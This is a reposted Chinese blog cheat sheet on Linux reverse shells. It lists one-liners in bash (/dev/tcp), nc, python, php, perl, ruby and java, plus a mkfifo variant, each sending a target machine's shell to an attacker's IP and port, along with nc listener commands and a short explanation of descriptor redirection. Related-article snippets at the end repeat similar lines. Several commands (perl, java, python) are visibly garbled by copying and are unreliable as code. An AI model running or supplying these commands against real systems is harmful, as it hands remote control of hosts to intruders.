Linux反弹shell姿势总结(转载)

最新推荐文章于 2024-06-01 11:15:00 发布
最新推荐文章于 2024-06-01 11:15:00 发布
阅读量289 收藏
点赞数
原文链接:https://blog.csdn.net/qq_45924653/article/details/107445417?utm_medium=distribute.pc_feed.none-task-blog-personrec_tag-5.nonecase&depth_1-utm_source=distribute.pc_feed.none-task-blog-personrec_tag-5.nonecase&request_id=5f209da0f769fa6e5f5d4567
版权

Linux反弹shell
Bash反弹shell
nc反弹shell
python反弹shell
php反弹shell
使用php的exec函数反弹shell
使用php的fsockopen远程连接
Perl反弹shell
Ruby反弹shell
Java反弹shell
其他反弹shell姿势

Linux反弹shell场景非常常见,常用于目标主机反弹shell给攻击机。
攻击机监听相应端口,目标机执行反弹shell,getshell!
Bash反弹shell
目标机:

bash -i >& /dev/tcp/ip/port 0>&1 //将shell反弹回相应的地址端口
1
本机使用nc进行监听:

nc -lvvp port //nc监听本机相应端口
1
在这里插入图片描述
在这里插入图片描述
搞懂原理
bash -i 打开一个交互式bash
/dev/tcp/ip/port 与指定地址端口建立TCP连接

“>&” 和 “0>&1” 是什么意思。这是Linux文件描述符和重定向。

标准输入(stdin):代码0,使用<或<<
标准输出(stdout):代码为1,使用>或>>
标准错误输出(stderr):代码为2,使用2>或>>
“>&”是将标准错误输出合并到标准输出中。
如执行 bash -i >& /dev/tcp/ip/port 它会将bash的标准输出和标准错误输出发送给指定地址端口,但本机不能进行输入。

“>&”最好的理解:

当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。
当>&后面接文件描述时,表示将前面的文件描述符重定向至后面的文件描述符。
0>&1是将标准输入重定向到标准输出中,这样本机就可以接收用户的输入了。
当目标机有python环境时,用得到的shell使用python可以获得一个较为完整的交互式shell。

python -c ‘import pty;pty.spawn("/bin/bash")’
1
nc反弹shell
当目标机安装nc时,可以使用nc进行反弹shell。
本机使用nc监听端口

nc -lvvp 4444
1
目标机使用nc方向连接

nc -e /bin/bash ip port
1
如果nc不支持 -e参数,可以使用linux的管道符进行反弹

nc -lnvp 3333
nc -lnvp 4444
1
2
目标机中使用nc方向连接

nc ip 3333|/bin/bash|ip 4444
1
python反弹shell
使用python反弹shell

python -c “import os,socket,subprocess;s=socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“ip"port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([”/bin/bash”,"-i"]);"
1
目标机python执行需要反弹的地址和端口
本机使用nc监听

nc -lvvp port
1
php反弹shell
使用php的exec函数反弹shell
php -r ‘exec("/bin/bash -i >& /dev/tcp/ip/port")’
1
使用php的fsockopen远程连接
php -r ‘$sock=fsockopen(“ip”,port);exec("/bin/bash -i <&3 >&3 2>&3");’
1
注:php反弹shell需要php关闭safe_mode选项,才能使用exec函数。

Perl反弹shell
perl -e ‘use Socket; i = " i p " ; i="ip"; i="ip";p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in( p , i n e t a t o n ( p,inet_aton( p,inetaton(i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’
1
Ruby反弹shell
ruby -rsocket -e’f=TCPSocket.open(“ip”,port).to_i;exec sprintf("/bin/sh -i <&%d>&%d 2>&%d",f,f,f)’
1
Java反弹shell
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c",“exec 5<>/dev/tcp/ip/port;cat <&5 2=”" |="" while="" read="" line;="" do="" $line="">&5 >&5; done"] as String[]) p.waitFor()
1
其他反弹shell姿势
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port>/tmp/f
1
exec 5<>/dev/tcp/ip/port;cat <&5|while read line;do $line>&5 2>&1;done
1
人生漫漫其修远兮,网安无止境。
一同前行,加油!

原文链接:https://blog.csdn.net/qq_45924653/article/details/107445417?utm_medium=distribute.pc_feed.none-task-blog-personrec_tag-5.nonecase&depth_1-utm_source=distribute.pc_feed.none-task-blog-personrec_tag-5.nonecase&request_id=5f209da0f769fa6e5f5d4567

forest_tree
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
LinuxN种反弹shell方法
YUGUOHOU的博客
11-26 9935
什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口, 并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络 概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器 (目标ip:目标机器端口),这是比较
linux反弹shell的原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
反弹shell的N种姿势
cainsoftware的博客
10-09 263
0x00 前言 在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结反弹shell常见的几种姿势。 0x01 Bash反弹 1.1 方法一 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0>&1#bash -i 打开一
【安全知识】——LInuxshell反弹姿势合集(更新中)
最新发布
A_991128a的博客
06-01 1071
*作者名:白昼安全主页面链接:座右铭: 不要让时代的悲哀成为你的悲哀专研方向: web安全,后渗透技术每日鸡汤: **当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。下面给大家列举一些平时用的比较多的这里的演示环境为。
反弹Shell姿势
xnvyou_的博客
04-14 145
反弹Shell多种姿势 0X01 Bash反弹 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0>&1 0X02 telnet反弹 攻击者主机上打开两个终端分别执行监听: nc -lvvp 4444 nc -lvvp 6666 目标主机中执行: telnet x.x.x.x 4444 | /bin/bash | telnet x.x.x.x 6666 (监听两个端口分别用来输入和输
Linux反弹shell姿势总结
她叫常玉莹
07-19 2587
Linux反弹shellBash反弹shellnc反弹shellpython反弹shellphp反弹shell使用php的exec函数反弹shell使用php的fsockopen远程连接Perl反弹shellRuby反弹shellJava反弹shell其他反弹shell姿势 Linux反弹shell场景非常常见,常用于目标主机反弹shell给攻击机。 攻击机监听相应端口,目标机执行反弹shell,getshell! Bash反弹shell 目标机: bash -i >& /dev/tcp/ip
Linux Shell总结_Shell总结_
10-03
以下是对Linux Shell的详细总结。 1. **Shell类型** Linux中有多种Shell,如Bash(Bourne-Again SHell)、Sh、Csh、Tcsh、Zsh等。Bash是目前最常用的一种,它是Sh的增强版,拥有更多的内置命令和特性。 2. **环境...
Linux下NC反弹shell命令(推荐)
09-15
本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作,并提供其他编程语言的反弹Shell命令作为参考。 首先,攻击者需要在自己的机器上启动一个监听服务来接收目标机器的连接。这通常通过以下`nc`命令完成: ...
linux shell脚本语法总结
05-28
此资源是本人对linux shell脚本的语法总结,均实际验证通过。
linux反弹shell姿势
hl1293348082的专栏
04-11 225
通常在获得webshell之后,如果是linux的服务器,一般会返回一个shell来对linux服务器做进一步的渗透,如:溢出提权、信息收集等。下面就说说linux自带的程序来反弹shell姿势。 自带工具 Bash 针对不同的linux版本,可能有不同的利用方式,这里简单列一下,在使用的时候大家自行测试。 0x01 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 0x02 exec /bin/bash 0&0 2>
转载反弹shell的各种姿势
qq_43233085的博客
08-13 447
转载反弹shell的各种姿势前言Linux 反弹shell姿势一:bash反弹姿势二:nc反弹姿势三:awk反弹姿势四:telnet反弹姿势五:socat反弹姿势六:Python反弹姿势七:PHP反弹姿势八:Perl反弹姿势九:Ruby反弹姿势十:Lua反弹姿势十一:JAVA反弹Windows反弹shell姿势一:nc反弹姿势二:powershell反弹姿势三:MSF反弹shell姿势四:Cobalt strike反弹shell姿势五:Empire反弹shell姿势六:nishang反弹shell姿势七:
反弹shell利用方式
07-29 537
反弹shell 1.bash反弹 攻击机监听端口 netcat: nc -nvlp 4444 -n: 不反向解析dns,即不通过ip解析域名 no dns -v: 详细信息输出 verbose -l: 监听 listen -p: 指定端口 port 靶机执行shell命令 bash -i >& /dev/tcp/攻击...
反弹shell的使用
csd_ct的专栏
08-15 219
反弹shell 反弹shell,是指从受害者的机器上主动连接到指定的机器上的可交且能执行命令的TCP进程。反弹shell的前提是受害者的 机器上有命令执行的漏洞。常见的一句话反弹shell,如下: bash 反弹shell bash -i >& /dev/tcp/127.0.0.1/9999 0>&1 2>&1 参数解释: bash -i:产生一个bash的交互环境 “>&”:将联合符号前面的内容与后面的内容相结合然后一起重定向给后者,将标准
linux反弹shell方法
weixin_53747497的博客
07-12 2092
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
linux反弹shell命令解析
原味瓜子、的博客
09-29 2245
文章目录1. 什么是反弹shell2. 反弹shell的用途3. 反弹shell操作步骤4. 原理 1. 什么是反弹shell 简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。 2. 反弹shell的用途 这个反弹shell大部分用途是用来侵入别人的主机。就是因为感觉很厉害的样子,所以才来研究这家伙 3. 反弹shell操作步骤 3.1. 在本机开启端口9090 nc -lk 9090 3.2. 在需要被控制的机器上执行如下两种命令中的一种即可 bash -i >& /
反弹shell的十种姿势
安全汪
03-07 2234
bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ,注意这个是由解析shell的bash完成,所以某些情况下不支持 perl版本: perl -e ‘use Socket;i="10.0.0.1";i="10.0.0.1";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(co
linux反弹shell检测
08-22
Linux 反弹 shell 是一种攻击技术,攻击者利用漏洞或恶意代码将远程 shell 注入受害者的系统,从而获取对系统的控制权。为了检测 Linux 反弹 shell,可以采取以下几种方法: 1. 监控网络活动:使用网络监控工具,如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值